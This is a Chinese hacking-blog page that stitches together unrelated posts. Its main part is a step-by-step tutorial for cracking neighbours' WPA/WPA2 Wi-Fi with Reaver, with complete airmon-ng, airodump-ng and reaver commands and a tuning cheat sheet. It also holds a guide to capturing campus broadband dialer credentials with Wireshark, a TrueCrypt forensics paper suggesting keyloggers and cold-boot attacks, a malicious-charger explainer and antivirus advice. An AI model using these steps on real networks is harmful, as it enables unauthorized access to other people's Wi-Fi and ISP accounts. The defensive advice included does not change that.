分类:黑客技术

破解Wi-Fi网络的WPA/WPA2密码

英文原文 http://lifehacker.com/5873407/how-to-crack-a-wi-fi-networks-wpa-password-with-reaver

716D483AC1C1

Wi-Fi网络能够让我们便利地访问因特网,但同时,我们又不希望隔壁抠门猥琐男总是蹭我们的网,所以自然要给WiFi加个密码,对吧?于是,好消息是,也许你已经看过我的另一篇文章,“如何轻易破解WEP密码”,所以你使用了更稳固的WPA安全协议。

但坏消息是,现在有一款自由开源新工具——Reaver,已经挖掘出了无线路由器的一个漏洞,由此能够破解绝大多数路由器上的密码。今天,我就来一步步介绍,如何使用Reaver破解WPA/WPA2密码。最后我会给出相应的防范对策。

文章的第一部分,是使用Reaver破解WPA的详细步骤,读者可以看视频,也可以跟着下面的文字一起做。然后,我会解释Reaver的工作原理。最后,介绍如何防范Reaver攻击。

http://www.youtube.com/embed/z1c1OIMbmb0?wmode=transparent&rel=0&autohide=1&showinfo=0&enablejsapi=1

在正式开始之前,我还是要不厌其烦强调一下:知识就是力量,但是拥有力量不代表着可以为所欲为、触犯法律。同样,骑白马的不一定是王子,会开锁的也不一定是小偷。本文只是关于某些技术的实验与验证,只适用于学习。你知道的越多,就能够越好的保护自己。

准备工作

首先,无需成为一名网络专家,学会使用复杂的命令行工具,你只需要准备一张空白DVD、一台能连接WiFi的电脑,并腾出几个小时时间,这就是我们基本需要的东西。要安装Reaver,可以有很多方法,但是这里我们建议你按照下面的指南来做:

7241A0A574A6

  • The BackTrack 5 Live DVD。BackTrack是一款支持自启动的Linux发行版,上面集成了大量的网络测试工具。虽然这对于安装、配置Reaver并不是必需的一个条件,但是对于大多数用户却是最简单一个方法。从BackTrack的下载页面(传送门)下载Live DVD,然后刻盘。这里你也可以下载镜像然后使用VMware安装,如果你不知道VMware是啥,额,那就还是刻盘吧。如图所示,下载的时候,下拉菜单选择BackTrack 5 R3版本、Gnome环境、根据你的CPU选择32或64位系统(如果这里不确定是32还是64,为了保险起见,请选择32位),下载类型选择ISO,然后就可以点击下载了。
  • 配有DVD光驱、支持WiFi的电脑。BackTrack支持大多数的笔记本无线网卡,这一点对于大多数读者应该没什么问题。同时,你的电脑需要有一个DVD光驱,这样才能从BackTrack光盘启动。我的测试环境是一台用了6年的MacBook Pro。
  • 附近要有采用WPA加密的WiFi网络。没WiFi网,你破解谁去 =。= ……一会我会在“Reaver的工作原理部分”介绍,WiFi防护设置是如何产生安全漏洞、WPA破解是如何成为可能的。
  • 最后,你还需要一点点的耐心。这是整个实验的最后一步,使用Reaver破解WPA密码并不难,它采用的是暴力破解,因此,你的电脑将会测试大量不同的密码组合,来尝试破解路由器,直到最终找到正确的密码。我测试的时候,Reaver花了大概两个半小时破解了我的WiFi密码。Reaver的主页上介绍,一般这个时间在4到10个小时之间,视具体情况而定。

让我们开始吧

此时,你应该已经把BackTrack的DVD光盘刻录好了,笔记本也应该已经准备就绪。

第1步:启动BackTrack

要启动BackTrack,只需将DVD放入光驱,电脑从光盘启动。(如果不知道如何使用live CD或DVD启动,请自行Google。)启动过程中,BackTrack会让你选择启动模式,选择默认的“BackTrack Text – Default Boot Text Mode”然后回车。

最终BackTrack会来到一个命令行界面,键入startx,回车,BackTrack就会进入它的图形界面。

第2步:安装Reaver

(文章更新:Reaver在R3版中已经预装,如果你安装的是BT5的R3版,这一步骤可以忽略,直接跳到第3步。)

Reaver已经加入了BackTrack的最新版软件包,只是还没有集成到live DVD里,所以,在本文最初撰写的时候,你还需要手动安装Reaver。要安装Reaver,首先设置电脑联网。

1.点击Applications > Internet > Wicd Network Manager 2.选择你的网络并点击Connect,如果需要的话,键入密码,点击OK,然后再次点击Connect。

连上网以后,安装Reaver。点击菜单栏里的终端按钮(或者依次点击 Applications > Accessories > Terminal)。在终端界面,键入以下命令:

apt-get update

更新完成之后,键入:

apt-get install reaver

如果一切顺利,Reaver现在应该已经安装好了。如果你刚才的下载安装操作使用的是WiFi上网,那么在继续下面的操作之前,请先断开网络连接,并假装不知道WiFi密码 =。= 接下来我们要准备破解它~

第3步:搜集设备信息,准备破解

在使用Reaver之前,你需要获取你无线网卡的接口名称、路由的BSSID(BSSID是一个由字母和数字组成的序列,用于作为路由器的唯一标识)、以及确保你的无线网卡处于监控模式。具体参见以下步骤。

找到无线网卡:在终端里,键入:

iwconfig

回车。此时你应该看到无线设备的相关信息。一般,名字叫做wlan0,但如果你的机子不止一个无线网卡,或者使用的是不常见的网络设备,名字可能会有所不同。

7901DC34821F

将无线网卡设置为监控模式:假设你的无线网卡接口名称为wlan0,执行下列命令,将无线网卡设置为监控模式:

airmon-ng start wlan0

这一命令将会输出监控模式接口的名称,如下图中箭头所示,一般情况下,都叫做mon0。

7133E68B0C02

找到你打算破解的路由器的BSSID:最后,你需要获取路由器的唯一标识,以便Reaver指向要破解的目标。执行以下命令:

airodump-ng wlan0

(注意:如果airodump-ng wlan0命令执行失败,可以尝试对监控接口执行,例如airodump-ng mon0)

此时,你将看到屏幕上列出周围一定范围内的无线网络,如下图所示:

7632B746CAE5

当看到你想要破解的网络时,按下Ctrl+C,停止列表刷新,然后复制该网络的BSSID(图中左侧字母、数字和分号组成的序列)。从ENC这一列可以看出,该网络是WPA或WPA2协议。(如果为WEP协议,可以参考我的前一篇文章——WEP密码破解指南

现在,手里有了BSSID和监控接口的名称,万事俱备,只欠破解了。

第4步:使用Reaver破解无线网络的WPA密码

在终端中执行下列命令,用你实际获取到的BSSID替换命令中的bssid:

reaver -i moninterface -b bssid -vv

例如,如果你和我一样,监控接口都叫做mon0,并且你要破解的路由器BSSID是8D:AE:9D:65:1F:B2,那么命令应该是下面这个样子:

reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

最后,回车!接下来,就是喝喝茶、发发呆,等待Reaver魔法的发生。Reaver将会通过暴力破解,尝试一系列PIN码,这将会持续一段时间,在我的测试中,Reaver花了2个半小时破解网络,得出正确密码。正如前文中提到过的,Reaver的文档号称这个时间一般在4到10个小时之间,因此根据实际情况不同,这个时间也会有所变化。当Reaver的破解完成时,它看起来是下图中这个样子:

7580A56B2ADC

一些要强调的事实:Reaver在我的测试中工作良好,但是并非所有的路由器都能顺利破解(后文会具体介绍)。并且,你要破解的路由器需要有一个相对较强的信号,否则Reaver很难正常工作,可能会出现其他一些意想不到的问题。整个过程中,Reaver可能有时会出现超时、PIN码死循环等问题。一般我都不管它们,只是保持电脑尽量靠近路由器,Reaver最终会自行处理这些问题。

除此以外,你可以在Reaver运行的任意时候按下Ctrl+C中断工作。这样会退出程序,但是Reaver下次启动的时候会自动恢复继续之前的工作,前提是只要你没有关闭或重启电脑(如果你直接在live DVD里运行,关闭之前的工作都会丢失)。

Reaver的工作原理

你已经学会了使用Reaver,现在,让我们简单了解一下Reaver的工作原理。它利用了WiFi保护设置(WiFi Protected Setup – 下文中简称为WPS)的一个弱点,WPS是许多路由器上都有的一个功能,可以为用户提供简单的配置过程,它与设备中硬编码保存的一个PIN码绑定在一起。Reaver利用的就是PIN码的一个缺陷,最终的结果就是,只要有足够的时间,它就能破解WPA或WPA2的密码。

关于这个缺陷的具体细节,参看Sean Gallagher’s excellent post on Ars Technica

如何防范Reaver攻击

该缺陷存在于WPS的实现过程中,因此,如果能够关闭WPS,WiFi就是安全的(或者,更好的情况是,你的路由器天生就木有这一功能)。但不幸的是,正如Gallagher在Ars的文章中所指出的,即使在路由器设置中人为关掉了WPS,Reaver仍然能够破解其密码。

在一次电话通话中,Craig Heffner说道,很多路由器即使关闭WPS都无法有效防范攻击。他和同事一起测试过,所有的Linksys和Cisco Valet无线路由器都是如此。“在所有的Linksys路由器上,你甚至无法手动关闭WPS,”他说,尽管Web界面中有关闭WPS配置的按钮,但是“它仍然会自动打开,极易受到攻击”。

因此,方法一:失败!。也许你可以亲自尝试把你的路由器WPS关闭,然后测试一下Reaver是否还能成功破解。

你也可以在路由器中设置一下MAC地址过滤(只允许指定的白名单设备连接你的网络),但是有经验的黑客还是能够检测出设备的白名单MAC地址,并使用MAC地址仿冒你的计算机。

方法二:失败!那到底该怎么办?

我的建议是,我曾经在我的路由器上安装了开源路由固件DD-WRT,成功防御了Reaver攻击。因为,DD-WRT天生就是不支持WPS的,因此,这成为了又一个我热爱自由软件的原因。如果你也对DD-WRT感兴趣,可以看一下这里的设备支持列表,看是否支持你的路由器设备。除了安全上的升级,DD-WRT还可以监控网络行为设置网络驱动器拦截广告增强WiFi信号范围等,它完全可以让你60美刀的路由器发挥出600美刀路由器的水平

 

Reaver v1.4 用法整理 含高级参数说明

 

使用方法:
airmon-ng start wlan0 //启动mon0监控
reaver -i mon0 -b MAC -a -S -vv //普通用法

如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)

其他命令
airodump-ng mon0 用来扫描周围无线信号
wash -i mon0 -C 这个是用来检测周围无线支持PIN的路由

如果一直pin不动,尝试加-N参数
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -N
也可以加延时 -t 3 -b 3

常用参数释疑
-i 监听后接口名称 网卡的监视接口,通常是mon0
-b 目标mac地址 AP的MAC地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高PJ速度
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
reaver -i mon0 -b MAC -d 0
用上述指令可以大幅加快PJ速度 但是有些AP可能受不了
-c (后跟频道数) 指定频道,可以方便找到信号
-p PIN码四位或八位 //已知pin码前4位可以带此参数,指定从这个数字开始pin。可以用8位直接找到密码。
-N 不发送NACK信息(如果一直pin不动,可以尝试这个参数)
-n 对目标AP总是发送NACK,默认自动
-t 即timeout每次穷举等待反馈的最长时间,如果信号不错,可以这样设置
reaver -i mon0 -b MAC -d 0 -t .5
-m, –mac=<mac> 指定本机MAC地址,在AP有MAC过滤的时候需要使用

小结-PJ时应因状况调整参数:
信号非常好:
reaver -i mon0 -b MAC -a -S -vv -d 0 -c 1
信号普通:
reaver -i mon0 -b MAC -a -S -vv -d .5 -t .5 -c 1
信号一般:
reaver -i mon0 -b MAC -a -S -vv -c 1

当出现有百分数时你就可以用crtl+c来暂停,它会将reaver的进度表文件保存在
1.3版:
/etc/reaver/MAC地址.wpc
1.4版:
/usr/local/etc/reaver/MAC地址.wpc
用资源管理器,手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中,
下次重启动后,再手工复制到/etc/reaver/ 目录下即可。

不是所有的路由都支持pin学习。AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
学习过程中也可随时随地按Ctrl+C终止PJ,重复同一个PIN码 或 timeou t可终止,reaver会自动保存进度。
继续上次的PJ,则再次在终端中发送:
reaver -i mon0 -b MAC -vv
这条指令下达后,会让你选y或n,选y后就继续了
当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了(总共一万一千个密码)。

参数详细说明:
-m, –mac=<mac> MAC of the host system
指定本机MAC地址,在AP有MAC过滤的时候需要使用
-e, –essid=<ssid> ESSID of the target AP
路由器的ESSID,一般不用指定
-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)
信号的频道,如果不指定会自动扫描
-o, –out-file=<file> Send output to a log file [stdout]
标准输出到文件
-s, –session=<file> Restore a previous session file
恢复进程文件
-C, –exec=<command> Execute the supplied command upon successful pin recovery
pin成功后执行命令
-D, –daemonize Daemonize reaver
设置reaver成Daemon
-a, –auto Auto detect the best advanced options for the target AP
对目标AP自动检测高级参数
-f, –fixed Disable channel hopping
禁止频道跳转
-5, –5ghz Use 5GHz 802.11 channels
使用5G频道
-v, –verbose Display non-critical warnings (-vv for more)
显示不重要警告信息 -vv 可以显示更多
-q, –quiet Only display critical messages
只显示关键信息
-h, –help Show help
显示帮助

-vv 显示更多的非严重警告

高级参数:
-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin
直接读取psk(本人测试未成功,建议用网卡自带软件获取)
-d, –delay=<seconds> Set the delay between pin attempts [1]
pin间延时,默认1秒,推荐设0
-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
AP锁定WPS后等待时间
-g, –max-attempts=<num> Quit after num pin attempts
最大pin次数
-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
10次意外失败后等待时间,默认0秒
-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts
每x次pin后等待y秒
-t, –timeout=<seconds> Set the receive timeout period [5]
收包超时,默认5秒
-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
M5/M7超时,默认0.2秒
-A, –no-associate Do not associate with the AP (association must be done by another application)
不连入AP(连入过程必须有其他程序完成)
-N, –no-nacks Do not send NACK messages when out of order packets are received
不发送NACK信息(如果一直pin不动,可以尝试这个参数)
-S, –dh-small Use small DH keys to improve crack speed
使用小DH关键值提高速度(推荐使用)
-L, –ignore-locks Ignore locked state reported by the target AP
忽略目标AP报告的锁定状态
-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet
每当收到EAP失败包就终止WPS进程
-n, –nack Target AP always sends a NACK [Auto]
对目标AP总是发送NACK,默认自动
-w, –win7 Mimic a Windows 7 registrar [False]
模拟win7注册,默认关闭

TrueCrypt加密模式及对应取证方法研究

TrueCrypt是全球著名的开源虚拟加密磁盘软件,目前支持Windows 7/Vista/xP/2000,Mac OS,和Linux等操作系统。TrueCrypt加密之后形成的虚拟磁盘,在输入正确密码之后可以像本地其它磁盘一样正常访问,内部所有文件都会自动加密,其加解密过程均为实时进行,并且效率很高。

 

1   TrueCrypt的特性

TrueCrypt主要有如下特性:
1.1 所创建的虚拟加密的磁盘形式上为
硬盘上面的一个文件,可以加载为一个方便操作的实际磁盘;

1.2 可以加密完整的磁盘分区,或者移动存取设备,如U盘或者移动硬盘;

1.3 可以加密一个分区或者一个安装好操作系统的完整硬盘驱动器;

1.4 加解密过程是完全自动的、实时的并且对用户透明的;

1.5 由于采用并行和流水线技术,对数据的加解密处理非常迅速,用户完全感觉不到与不作加密操作时的差别;

1.6 双重加密,即使是在胁迫的情况下也可以实现隐藏磁盘和操作系统的目的。
2 TrueCrypt算法

2.1 TrueCrypt采用如表1所示的加密算法。

 

20131109002632

在90年代中期,美国国家标准与技术研究院(NIST)公开征集加密算法作为区块加密标准,筛选最后一轮后还剩下Rijndael、Serpent、Twofish,这三种算法各有千秋,Serpent被认为最安全,而Rijndael速度最快,Twofish则居中。最后NIST选择了Rijndael作为高级加密标准(AES,Advanced Encryption
Standard)的算法,并在2002年5月26日使其成为有效的标准,至2006年,高级加密标准已然成为对称密钥加密中最流行的算法之一。
2.2

TrueCrypt目前主要支持RIPEMD一160,SHA一512和Whirlpool等哈希算法,这些哈希算法被随机数生成器用来做伪随机“混淆” 函数或者被头密钥衍生函数用作伪随机函数。在生成新的卷时,由随机数生成器产生主、次密钥(XTS模式)和盐。
3

TrueCrypt所采用操作模式XTS所谓模式,就是方法,就是加密的方法。TrueCrypt所采用的XTS模式实际上就是XEX模式,XEX模式由Phillip Rogaway于2003年所设计,XEX模式和XTS模式细微的差别在于:XTS模式使用两个独立的密钥,而XEX模式仅使用一个密钥。2010年XTS模式被NIST证明可以很好保护存储设备上面的数据机密性。而此前,已经于2007年被美国电气和电子工程师协会(IEEE)证明可以对面向块的存储设备上面的数据实现加密保护。

20131109003811

 

4  TrueCrypt加密之后的取证方法
TrueCrypt加密之后的文件, 目前没有好的办法破解, 因此在调查取证的时候,可以考虑以下方法:
4.1 分析和检查是否有TrueCrypt加密之后的文件存在。

 

(a)TrueCrypt加密之后的文件没有固定的特征,如果加密者把这样的文件保存为常见格式的文件时,利用Encase、Winhex、取证大师等软件分析文件特征,对于不匹配的文件重点分析,进行排查是否为加密文件;
(b)搜索系统所安装软件,包括历史安装记录,检查是否有安装TrueCrypt软件的痕迹;

 

(c)搜索大文件,作为加密容器,一般都存放着多个文件,因此,较大的文件可能性会比较大,不过也不排除特别重要的文件单独加密的可能。
4.2
TrueCrypt能设置双层加密,即在一个加密卷中再隐藏另一个加密卷,隐藏卷形象的来说就是“嵌套”在普通加密卷里边的。当用户被胁迫解密加密卷时,用户可以把隐藏加密卷的“外套”普通加密卷解密,透露一些无关紧要的信息,而真正的受保护的信息则隐藏在隐藏卷中,数据得以保护。加密卷的加载流程如下图所示:

20131109003907

 

对于此类情况,首先要考虑是否能得到隐藏卷的密码,如果不能,应该把数据备份之后,用无用数据填充的方式覆盖普通卷空余的空间,可以把伪装在普通卷里面的数据破坏,让加密者自己也无法再恢复这些隐藏的数据。
4.3

TrueCrypt对数据的操作都是在内存(RAM)中进行,因此软件不确定是否在计算机的内存中保存有密码、主密钥和一些未加密的数据。而最新的研究成果显示,即使计算机关机后,内存保存的资料,包括加密程序的安全锁和口令仍未消失,最长可能达数分钟之久,透过冷冻计算机记忆芯片,还可延长内存暂存资料的时间,普林斯顿大学一班计算机保安专家组成的研究小组组长——计算机科学家费尔滕解释:只要以液态氮(摄氏一196度)冷冻计算机芯片,即使电源已中断,内存仍可保持状态至少数小时。然后将芯片安装回计算机,就可读取里面的资料。
4.4

在使用者机器上安装使用间谍或者监控程序,开机自动运行,利用键盘记录钩子记录TrueCrypt加载卷的密码。此外,还可以利用政策,社会工程学方法(如通过其他途径获得其他帐号密码或者其他方面的信息来分析加密文件的密码)等方式来获取密码,并注意是否可以获取隐藏卷的密码。
5 总结
TrueCrypt是全球著名的开源加密软件,有着安全、易用、功能强大等优点,也适用于可移动存储设备的加密。随着在国内应用的推广,对使用该软件加密之后的计算机数据的取证也变得越来越困难,因此有必要对这方面加强研究,总结规律,以提高取证的效率。
参考文献:
[1]王超峰,姜梅,宋嘎子.开源加密软件TrueCrypt研究.微计算机信息.2010年第26卷第2— 3期.
[2]宣龙,朱兴星,侯方勇.T rueCrypt软件保护机密文档的研究和应用.科技信息(学术版).2008年第3期.
[3]TrueCrypt软件用户指南.
[4]http://www.cnr.cn/nx/shtc/it/200802/t20080229504719237.html

 

彭建新 杜威 王晓雷

(广东警官学院计算机系,广东广州 510230)

摘要:分析开源加密软件TrueCrypt的加密算法、操作模式XTS,提出在计算机调查取证时所对应的方法。

浅谈协同算号(让你使用上路由器)

第一种,反编译它的软件(这个貌似属于高科技,我是审不懂的),从而拿到部分源码,知道它的算号方式,再做出相应的软件

第二种,异地算号,经测试发现,西科大的帐号,西财大拨号是拨不通的,会出现691,的错误,只要是691,那么就可以提取帐号了。
帐号提取:异地拨号之后,出现691错误,开始提取帐号,很多人在想,这个帐号是不是要拿相应的软件才能提取,这里告诉你们,windows自带的有地方可以查看你的pppoe帐号。
拨号之后,出现691才能提取,出现651或者其他错误,只要不是691的账户密码不正确,便不能提取。
在windows的桌面,“我的电脑”(计算机)右键进入“管理”进入“事件查看器”进入“windows日志”进入“应用程序”

8ebf21a4462309f706e87d4e720e0cf3d5cad6d9
帐号,就这么被拿出来了

 

9a40c8ea15ce36d366ee536c3af33a87eb50b1fe
不过奇怪的是,我同学算出来的,跟我不一样呃,我的在帐号的十三位的时候是D208的格式,而他的机器上面跟我用linux和别人算出来的,那个地方都是2010

第三种算号:
两台电脑,同一个学校,同一个网路环境。把你的帐号,拿两台电脑拨号,你的先拨上,拨上之后,在另一台电脑上拨号,他是坑爹拨不通的,这个帐号就能从他的电脑上提取。
为什吗能提取出来拨号,原因很简单,电xin很贱,不过你的帐号在使用中,而别人用你的帐号拨号,协同算出来的是正确的,但是你的帐号在线,另一台电脑算出来的也是正确的,却没有通过服务器的认证,所以服务器不会断定另一台电脑上面的帐号不能用。
帐号查看遵循第二种查看方法。

第四种算号:
linux中算号,步骤繁琐.

天翼飞YOUNG校园协同拨号器3.03算号破解教程

最近电信校园宽带PPPOE服务器频繁更新,

导致之前流传的PPPOE校园宽带拨号器在我校大多无法正常连接,

无法通过路由器接入电信校园宽带。

而天翼飞YOUNG校园拨号器3.03版本的宽带帐号加密需要与PPPOE接入服务器交互共同完成,

且暂时无法取得服务端的算法。

现给出一个抓包的方法获取电信校园宽带加密帐号的方法。

同时希望有能力的同学分享真正的批量算号器.

 

 

原理:用抓包工具取得天翼飞YOUNG校园拨号器成功联网前最后一次发出的帐号数据。

并利用Too many conections冲突,使最后一次发出的帐号不被使用。
本教程操作环境:宿主机Gentoo Linux + 虚拟机Windows xp

需要额外安装的软件: Wireshark 天翼飞YOUNG校园拨号器3.03
注:算号过程中需要使你的校园宽带帐号已经登录。

1.算号前的准备
所需软件的下载与安装
1.1Wirshark
下载地址:http://www.pc6.com/softview/SoftView_63986.html   安装:双击===>一路NEXT
1.2天翼飞YOUNG校园拨号器3.03
下载地址: http://dialer.189fy.com/download/Dialer3.03.exe
安装:同上
2.配置Wirshark
2.1使用Wirshark GUI版抓包
2.1.1双击图标clip_image001打开Wirshark GUI版
clip_image003

 

2.1.2设置抓包的网络接口开始抓包

2.1.2.a点击选择有线网卡名称开始抓包

clip_image005

 

clip_image007

2.1.2.b设置显示过滤规则
显示过滤规则:chap.name contains “E303” (回车)

clip_image009

2.1.3用天翼飞YOUNG校园拨号器拨号

clip_image010

点击连接后会提示Too many conections

clip_image012

Wirshark中已经有加密帐号的信息了

clip_image014

2.1.4复制所需加密帐号
clip_image015

 

2.2使用Wirshark CLI版抓包
Tshark是Wirshark的命令行版。
2.2.1首先打开windows下的cmdshell
win+R—键入cmd—回车

clip_image017

2.2.2配置Tshark
将操作路径切换到Wirshark安装目录(本教程中为默认地址:C:\Program Files\Wireshark)
命令: cd C:\Program Files\Wireshark
2.2.2.a这时你可能需要设置抓包的网络接口(单网卡用户可跳过此步骤到2.2.3)
2.2.2.a.1列出当前存在的网络接口
命令: tshark –D

回显:
clip_image018

记住包含你有线网卡名称那一项的序号 本教程中为1

2.2.3开始抓包
命令: tshark -i 1 -R “chap.length>=53” -T fields -e chap.name (这里的1即为2.2.2a.1中所需记住的那个序号)
注:也可以输出重定向到文件在命令后加上>文件路径
示例:tshark -i 1 -R “chap.length>=53” -T fields -e chap.name>user.txt

回显:
clip_image019

2.2.4用天翼飞YOUNG校园拨号器拨号同2.1.3

2.2.5这时你会看到cmdshell程序中已经有了数据
回显:
clip_image020

 

2.2.6复制所需加密帐号
最后一个字符串就是我们需要的帐号。
右键—-标记—选定所需帐号—右键完成。键入CTRL+C可中止抓包。
clip_image021

 

本教程结束
后记:这样得到的加密帐号好像有时效性,我也不知道具体时间是.

恶意充电器

现在手机的功能已经不仅仅是通话和发短信了,随着各类金融相关的应用移植到手机上,手机银行,移动支付,电子钱包等等功能都集成到手机上,手机就成了黑客们的新目标。最近就出现了恶意充电器这一新“产品”。

大部分手机,包括iPhone和Android手机,都已经把充电端口和数据传输端口整合成一个了,这给用户带来了极大的便利,但同时这个接口也就暴露出了安全问题。

android

先来看看Android的手机,记得装上豌豆荚等软件之后,就可以在电脑上操作手机了,可以给手机安装各种应用,甚至不需要手机上进行操作。那么假如一个充电站是电脑伪装的,有黑客在后台进行操作,然后不少不知情的游客过来充电,一连上数据线之后,手机就被安装了一些恶意软件。之后你的数据就暴露在黑客面前了,到时候银行资金被盗,QQ被盗,游戏账号被盗。

iOS系统好像也可以通过这种方式来安装应用,我的未破解iPad就是用PP助手安装了收费的应用,而且也是只要电脑端操作就可以实现的。那么同理充电站也可以用这个方式来将iOS设备植入恶意软件。

以上的就是恶意充电器的原理,当然是我自己理解的,并不一定科学。现在只要在充电器中加入相信的芯片,能够实现PP助手或者豌豆荚这样的功能,那么就相当于做出了一个恶意充电器,实际上已经有研究人员尝试过并成功了,他们即将在Black Hat安全大会上介绍对应的防御措施以及建议如何改善安全性能。

现在知道手机的安全问题有多么无法预见多么可怕了吧,我想我们了解到的黑客行为只是皮毛而已,还有很多没有公布出来的,总之,我们以后在让手机接触其他东西的时候也要注意安全,手机病毒将比电脑病毒更加可怕。

安全防护解决方案

今次要推荐的软件是适合于普通电脑的两款免费安全软件(言下之意,以不折腾但又勘用为主),德国 Avira Operations GmbH & Co. KG 开发的杀毒软件 Avira Free Antivirus,与美国 PWI, Inc 开发的防火墙 Privatefirewall。

Avira 在中国已经是比较知名的杀毒软件了,中国网民亲切的称呼其为「小红伞」。Avira 向普通用户提供免费版(Avira  Free Antivirus)、高级版(Avira Antivirus Premium)与互联网安全版(Avira Internet Security)这几个不同的版本,显而易见,高级版与互联网安全版是收费的(且官方收费昂贵,如果需要购买,建议先看看经官方授权的淘宝店)。

免费版只提供较为单纯的病毒防护功能(现在还提供了 Web Protection 功能,但使用此功能需要额外安装浏览器插件);

高级版不仅包括免费版的全部功能,还提供了 Web Protection 与 Avria 专家的实时支持(如上所述,免费版已经拥有了 Web Protection,而对于个人用户专家支持也显得比较鸡肋,所以这个版本的存在意义是什么?);

互联网安全版不仅包括高级版的的全部功能,还提供了防火墙、垃圾邮件防护与备份工具(垃圾邮件防护交给邮件服务器做就好了,备份工具显然与 Windows 自带功能重复…)。

所以现在针对不折腾的个人用户推荐两种方案,Avira 免费版 + Privatefirewall,或是 Avira 互联网安全版。

方案一:Avira 免费版 + Privatefirewall

对于第一种方案,由上所述 Avira 最受欢迎的其实是免费版,不仅因为免费,还因为这个版本提供了一个单纯的防病毒软件——病毒查杀能力高、没有防火墙、没有太多的主动防御、较低的硬件要求,很适合与其它安全软件搭配使用。

卡饭论坛上流行的搭配组合是「红豆」组合,即将 Comodo 防火墙与 Avira 免费版进行搭配。Comodo 亦是一款来自美国的安全产品,其防火墙也带有 HIPS,只是需要花费一些精力学习;如果想要学习 Comodo,请按此处

本文不打算讨论 Comodo 的更多内容;对于普通用户来说,Privatefirewall 既可以不加设定的使用,也可以手动打磨,打磨的难度是低于 Comodo 的。

首先下载安装 Avira 免费版。请注意,Avira 的 Web Protection 的安装选项在勾选安装 IE 浏览器插件后才会出现,但 Web Protection 与 Privatefirewall 有冲突,会导致 Privatefirewall 不能拦截某些程序的流量。尚不清楚各自的新版本是否解决了这个问题。因为 Web Protection 表现的不是特别出色,常有人反馈它拖慢了某些下载软件(如迅雷)的速度,或者是因为误报导致少数网页显示异常。由于 Web Protection 主要检测网络流量中的恶意内容,但不具备防火墙的能力,只安装病毒防护功能其实不会牺牲此方案的安全性。

另外,即使是目前最新的版本 Avira 2013 也未能兼容 Windows8,请 Windows8 用户慎重使用。新的测试版 Avira Version 2013 Patch5 声称改善了 Windows8 兼容性,可以按此处获得安装文件。

Avira 免费版带有广告,基本上每天会弹出一次;广告内容倒不像国产软件那般低俗,多数为自家软件的宣传。不过可以通过很简单的方式屏蔽广告,具体方法请按此处

如果你打算试用 Web Protection,修改注册表可以骗过 Avira 安装程序让你不安装浏览器插件就能使用 Web Protection(再次说明,Web Protection 可能导致 Privatefirewall 冲突):

对于 32 位系统,将以下文字保存为 reg 文件并双击导入注册表:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREAskToolbar]

[HKEY_LOCAL_MACHINESOFTWAREAskToolbarMacro]
"tb"="AVR-W1"

对于 64 位系统,将以下文字保存为 reg 文件并双击导入注册表:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREWow6432NodeAskToolbar]

[HKEY_LOCAL_MACHINESOFTWAREWow6432NodeAskToolbarMacro]
"tb"="AVR-W1"

安装时取消勾选安装浏览器插件,完成后会发现 Web Protection 成功开启。

再说 Privatefirewall。Privatefirewall 原来是一款付费软件,但也许公司不做个人的生意了,所以现在完全免费。

Privatefirewall 体积很小,占用资源也很低,界面更加朴素,属于大部分时间都没有存在感的软件;但倘若有什么可疑进程有动作,它内建的 HIPS 就会发出警告。

中上方的三个图标为情景模式选择,可以根据家庭 / 工作 / 公用网路选择不同的防护等级,Firewall 红绿灯可以关闭 / 打开防火墙,或者完全阻止网路流量。

可以针对不同进程设定是否允许特定 IP 段 / 端口的入站 / 出站 UDP 或 TCP 访问:

Privatefirewall 还拥有一个轻量级 HIPS,默认情况下会放行受信任的发布商所发行的程序,而提醒未知程序的关键动作:

如果信任此程序,则同时勾选「Remember this setting」和「Apply to all alerts」并点击「Allow」,否则根据情况暂时放行或阻止此动作,甚至终止程序。

此外,程序还提供了防火墙日志和当前监听网络的程序列表,方便寻找网络异常源头。

Privatefirewall 拥有定期学习的功能,会自动放行你常用的程序,并结合其「默认放行受信任的程序」之功能,既保护了你的电脑,又不用进行繁琐的设定。

 方案二:Avira 互联网安全版

方案一是完全免费且比较轻松的一种搭配,但如果想要更加简单易用,Avira 互联网安全版也是不错的选择。

前面说过,Avira 互联网安全版除了病毒防护,对个人用户意义较大的功能还有 Web Protection 与防火墙,这些都不用特别设定就能使用。

Avira 不提供控制其它程序行为的 HIPS,防火墙是纯粹的网路防火墙。有新程序试图访问网路时会发出提示。

要详细设定防火墙的话也可以,只是有些麻烦,因为 Avira 提供的规则设定不太友好,要在一段话里通过点击关键词来改变含义(简直是奇葩了喂!),点多几下头脑就会晕掉…

Avira 互联网安全版是收费软件,官方购买要价 RMB 292.00 / 年,RMB 585.00 / 三年,但经官方授权的淘宝店却要便宜很多。

Safebeta 是 Avira 初进大陆市场时的合作店家,现在似乎因为没时间打理的关系,Avira 互联网安全版正以 RMB 25.00 / 两年的价格抛售,而且更有新浪微博转发送序列号的活动,有需要的可以看看:

【正版特价】小红伞 Avira Internet Security 2012 2013 两年正版

请注意,在上面这家店购买的序列号授权的用户为 Uschi Lotz 而非你的名字,经过实验序列号也不可以叠加,对此介意的朋友可以看看下面这家。

iholy 的店主似乎一直混迹于卡饭,也是可以相信的店家,价格要贵一些,RMB 234.00 / 三年:

【正版】Avira Internet Security2013 小红伞 三年(S)

发淘宝的链接不是为了做广告,也不是为了什么返利,只是提供更优惠的正版,也方便大家对价格进行比较。

来自:ray